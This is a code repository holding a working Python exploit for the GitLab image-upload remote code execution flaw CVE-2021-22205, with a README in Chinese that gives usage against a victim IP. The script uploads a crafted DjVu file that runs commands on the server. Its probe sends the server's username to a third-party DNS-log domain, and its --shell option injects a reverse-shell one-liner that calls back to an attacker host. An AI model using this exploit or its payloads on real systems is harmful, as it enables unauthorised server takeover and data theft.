├── .gitignore ├── CVE-2021-22205.py └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. 
github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | -------------------------------------------------------------------------------- /CVE-2021-22205.py: --------------------------------------------------------------------------------
# CVE-2021-22205 — GitLab image-upload RCE probe / exploit script (affected version ranges
# are listed in the README). Both check() and attack() upload a hand-built DjVu container
# whose annotation chunk carries a Perl `qx{...}` expression, which the vulnerable metadata
# parser on the GitLab host (ExifTool's DjVu handler) evaluates. The "vulnerable" verdict
# printed by both functions is only a response-string heuristic — see the notes on `flag`.
# Defender's view: the observable artefacts are an image/jpeg upload to /uploads/user whose
# body starts with the DjVu magic ("AT&TFORM"), followed by the GitLab host performing the
# embedded command (outbound DNS/HTTP in check(), an outbound TCP shell in attack(--shell)).
import requests
from bs4 import BeautifulSoup
import base64  # imported but unused in this file
import random  # imported but unused in this file
import sys  # imported but unused in this file
import os  # imported but unused in this file
import argparse

# Silences urllib3's InsecureRequestWarning for the verify=False requests below. Certificate
# validation stays disabled for the whole run, so the tool also talks to self-signed or
# intercepted hosts without complaint.
requests.packages.urllib3.disable_warnings()


def banner():
    """Print the ASCII-art banner shown before argument parsing."""
    print("""
 ______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
\____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/
""")


def check(target_url):
    """Probe one GitLab instance for CVE-2021-22205 and print a verdict line.

    Flow: GET /users/sign_in to scrape a CSRF token, then POST a crafted DjVu file to
    /uploads/user and report "vulnerable" when the response body contains
    'Failed to process image'.

    Caveats visible in the code:
      * The command baked into this probe is `curl \\`whoami\\`.82sm53.dnslog.cn`, so a
        successful run makes the *target* resolve a hostname under a third-party DNS-log
        domain that embeds its username. Results therefore leak to infrastructure the
        operator does not control, and the verdict printed here never looks at that callback.
      * Every exception is printed and swallowed, so a network error or a page-layout
        mismatch reads like a failed probe rather than an error.

    Args:
        target_url: Base URL of the instance; trailing slashes are stripped.
    """
    session = requests.Session()
    try:
        # verify=False: the server certificate is not validated (see disable_warnings above).
        req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False)
        soup = BeautifulSoup(req1.text, features="lxml")
        # Positional lookup: assumes the 17th meta tag on the sign-in page is the CSRF token.
        # Any other layout raises IndexError (or yields the wrong value), which the except
        # below turns into a printed message instead of a failure.
        token = soup.findAll('meta')[16].get("content")
        # Multipart body: a single "file" part declared as image/jpeg whose content is a DjVu
        # container (AT&TFORM / DJVM / DIRM ... FORM / DJVI / ANTa). The ANTa annotation holds
        # `(metadata (Copyright "..." . qx{<command>} . "..."))`; the qx{} is what the
        # vulnerable parser executes. The boundary string must match the Content-Type header.
        data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.82sm53.dnslog.cn} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
        # Fixed browser-like User-Agent (Chrome/41) and the scraped token in X-CSRF-Token.
        # The static UA and boundary are constant across every run of this script.
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
            "Connection": "close",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
            "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"}
        # Indicator string. NOTE(review): this is a generic upload error, so its presence shows
        # the file reached the image pipeline, not that the command ran — treat the verdict as
        # a heuristic (false positives and negatives are both possible).
        flag = 'Failed to process image'
        req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)
        if flag in req2.text:
            print("[+] 目标 {} 存在漏洞".format(target_url))
        else:
            print("[-] 目标 {} 不存在漏洞".format(target_url))
    except Exception as e:
        # Broad catch: any failure (connection, parsing, IndexError above) is only printed.
        print(e)


def attack(target, command, shell=False, ip=None, port=-1):
    """Upload the crafted DjVu with a caller-supplied command; same verdict logic as check().

    Duplicates check() except for the command spliced into `qx{...}`; the two functions
    share the token scraping, headers, indicator string and exception handling, so any
    observation made on check() applies here too.

    Args:
        target: Base URL of the GitLab instance; trailing slashes are stripped.
        command: Command text spliced verbatim into the payload's qx{}. Ignored when
            `shell` is True. A None value (no -c on the CLI) makes the string concatenation
            below raise TypeError, which is caught and printed.
        shell: When True, `command` is replaced by a Python one-liner that connects from the
            GitLab host to ip:port and attaches /bin/sh -i to the socket (a reverse shell —
            plain TCP egress from the server, which is the detection signal on the wire).
        ip, port: Call-back address for that shell. Nothing validates them; None values are
            interpolated literally as "None". Note the CLI passes port=None, not -1.
    """
    if shell:
        command = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((" \
                  f"\\\"{ip}\\\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno()," \
                  "2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);' "

    session = requests.Session()
    try:
        # verify=False: the server certificate is not validated.
        req1 = session.get(target.strip("/") + "/users/sign_in", verify=False)
        print(f"[+] 发送请求 {target}")
        soup = BeautifulSoup(req1.text, features="lxml")
        # Positional CSRF-token lookup (17th meta tag), as in check(); brittle to page layout.
        token = soup.findAll('meta')[16].get("content")
        # Same DjVu container as check(); only the qx{} content differs (`command`, unescaped).
        data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{" + command + "} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 "
                          "Safari/537.36",
            "Connection": "close",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
            "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"}
        # NOTE(review): as in check(), this generic error string does not prove the command
        # executed; the printed "vulnerable" line is a heuristic, not confirmation.
        flag = 'Failed to process image'
        req2 = session.post(target.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)
        if flag in req2.text:
            print("[+] 目标 {} 存在漏洞".format(target))
        else:
            print("[-] 目标 {} 不存在漏洞".format(target))
    except Exception as e:
        # Broad catch: failures are printed, never re-raised.
        print(e)


def scan(file):
    """Run check() on every non-blank line of a UTF-8 URL list.

    Not reachable from the CLI below (the entry point only calls attack()). The file
    object opened here is never closed explicitly; it is left to garbage collection.

    Args:
        file: Path of a text file with one URL per line.
    """
    for url_link in open(file, 'r', encoding='utf-8'):
        if url_link.strip() != '':
            url_path = format_url(url_link.strip())
            check(url_path)


def format_url(url):
    """Prefix "https://" when `url` does not start with "http", then strip whitespace.

    The test is a literal four-character prefix compare, so e.g. "HTTP://host" is prefixed
    again. If the try body raises (e.g. `url` is None) an error line is printed and the
    function falls through, returning None implicitly — callers get no exception.

    Args:
        url: Host or URL string.

    Returns:
        The normalized URL, or None on error.
    """
    try:
        if url[:4] != "http":
            url = "https://" + url
        url = url.strip()
        return url
    except Exception as e:
        print('URL 错误 {0}'.format(url))


if __name__ == '__main__':
    banner()
    parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
    # None of the options is marked required, so every value below may be None. attack() then
    # fails inside its own try/except (e.g. None.strip, or None in the string concatenation) and
    # only prints the exception. The CLI default for --port is None, not attack()'s -1.
    parser.add_argument('-t', '--target', dest='target', type=str, help='目标URL')
    parser.add_argument('-c', '--command', dest='command', type=str, help='执行命令')
    parser.add_argument('--shell', action='store_true', dest='shell', help='是否反弹shell')
    parser.add_argument('-i', '--ip', type=str, dest='ip', help='反弹shell ip')
    parser.add_argument('-p', '--port', type=int, dest='port', help='反弹shell端口')
    args = parser.parse_args()

    target = args.target
    command = args.command
    shell = args.shell
    ip = args.ip
    port = args.port
    # Single-target mode only; scan() is defined above but has no CLI switch.
    attack(target, command, shell, ip, port)
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2021-22205 2 | 由于Gitlab未正确验证传递到文件解析器的图像文件从而导致命令执行。攻击者可构造恶意请求利用该漏洞在目标系统执行任意指令,最终导致Gitlab服务器被控制。由于网上大多缺少反弹shell,故修改了网上写的脚本,增加了一键getshell功能 3 | 4 | ## 影响版本 5 | * 11.9 <= GitLab(CE/EE)< 13.8.8 6 | * 13.9 <= GitLab(CE/EE)< 13.9.6 7 | * 13.10 <= GitLab(CE/EE)< 13.10.3 8 | 9 | ## 使用说明 10 | ```shell 11 | ______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____ 12 | / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___| 13 | | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 14 | | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) | 15 | \____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/ 16 | 17 | usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP] 18 | [-p PORT] 19 | 20 | GitLab < 13.10.3 RCE 21 | 22 | optional arguments: 23 | -h, --help show this help message and exit 24 | -t TARGET, --target TARGET 25 | 目标URL 26 | -c COMMAND, --command COMMAND 27 | 执行命令 28 | --shell 是否反弹shell 29 | -i IP, --ip IP 反弹shell ip 30 | -p PORT, --port PORT 反弹shell端口 31 | ``` 32 | ## 使用 33 | ```shell 34 | python3 CVE-2021-22205.py -t [受害者ip] --shell -i [vps ip] -p [vps port] //反弹shell 35 | python3 CVE-2021-22205.py -t [受害者ip] -c [command] //执行命令 36 | ``` 37 | ## 声明 38 | 此脚本仅可用于测试使用,勿作他用 39 | 
--------------------------------------------------------------------------------